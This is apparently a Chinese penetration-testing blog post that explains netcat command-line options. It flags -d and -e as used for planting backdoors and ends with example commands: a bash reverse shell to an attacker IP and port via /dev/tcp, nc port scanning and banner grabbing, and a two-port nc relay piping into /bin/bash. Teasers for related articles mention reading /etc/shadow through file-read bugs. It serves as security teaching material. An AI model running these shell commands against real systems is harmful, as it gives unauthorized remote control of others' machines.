当前位置:首页 > 网络安全 > web渗透 > 正文内容

netcat命令及解释

7个月前 (11-29)914

作为web渗透中的扛把子工具,我们必须掌握灵活使用它,下面我们来了解一下它的命令吧!

netcat

u=1439963218,2940044238&fm=26&gp=0.gif

-d

表示脱离命令窗口,在后台运行,常用于后门建立过程

假设监听了一个端口,但是关闭了那个cmd窗口那么nc就不会监听了,加入了-d就会在后台运行

-e

执行某个程序,常用于后门建立过程(cmd. exe、/bin/bash)

-G gateway

设置网关,常用于突破内网限制

-g num

路由跳数

-i sec

设置发送每一行数据的时间间隔(以秒计算)

-l

设置netcat处于监听状太等待连接

-L

设置netcat处于昕状态等待连接,当客户端端口,服务端依旧回到等待状

-n

设置netcar只扫描ip不进行DNS解析

-o file

设置传输十六进制的数据

-p port

设置本地监听的端口了

-r

设置netcat随机化的端口号

-s addr

设置netcat源地址(用于端口扫描上)

-t

回复telnet的请求数据包

-u

设置netcat使用UDP模式(默认是使用TCP协议)

-v

显示详细信息

-w secs

设置连接超时秒数

-z

设置扫描模式,表示发送的数据包中不包含任何payload

服务器(linux)没有netcat,使用bash -i >& /dev/tcp/攻击者ip/攻击者port 0>&1 反弹shell(0表示输入,1表示输出)

nc -nvz ip port扫描端口开放情况

echo "" | nc -vn ip port    显示banner信息

客户端开两个端口,一个输入一个输出

服务器端nc ip 入port | /bin/bash | nc ip 出port 


扫描二维码推送至手机访问。

版权声明:本文由零零博客发布,如需转载请注明出处。

分享给朋友:

相关文章

漏洞挖掘 | 记一次越权登录

漏洞挖掘 | 记一次越权登录

http://xxxxx/index.html?userNo=xxxx可以直接登录学生用户(女朋友给的)fofa收集了一波4个站点。。。,由于没扫到备份,只能黑盒测了然后发现一处接口 杂七杂八测试了下...

文件读取漏洞总结

文件读取漏洞总结

1、一般我拿到一个任意文件读取得先判断权限大不大,如果权限够大的话可以直接先把/etc/sadow读下来,权限不够就读/etc/passwd,先把用户确定下来,方便后续操作2、读取各个用户的.bash...

怎么隐藏网站后台?

怎么隐藏网站后台?

1:压缩网站后台目录然后再把后台目录删了,需要使用后台时再解压回来2:把网站后台目录放在旁站(绑定不同的域名)3:把网站后台目录放入其它服务器(操作难易根据网站程序复杂程度决定)4:限制网站后台目录访...

红队常用的那些渗透工具

红队常用的那些渗透工具

一:信息收集端口收集之railgun其实railgun是一个相对综合点的工具,或者说扫描器。一般我是用它来做端口扫描,这款工具也是在做端口扫描的时候接触到的,发现挺不错。到这里肯定有人会问:为什么不用...

web渗透测试是什么

web渗透测试是什么

web一般我们是指网站,渗透的话就是查找漏洞和缺陷拿到权限一步一步往里渗,直到拿到最高权限web渗透测试有两种白盒测试:在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析黑盒测试...

web缓存欺骗和web缓存投毒攻击方式

web缓存欺骗和web缓存投毒攻击方式

 首先我们先来了解一下什么是缓存,缓存在什么地方关于缓存由于现在网站应用的复杂性,通常一个首页就会进行大量资源的加载,为了使用户更快的加载网页,几乎都会使用缓存,即将一些常用的静态文件,存储...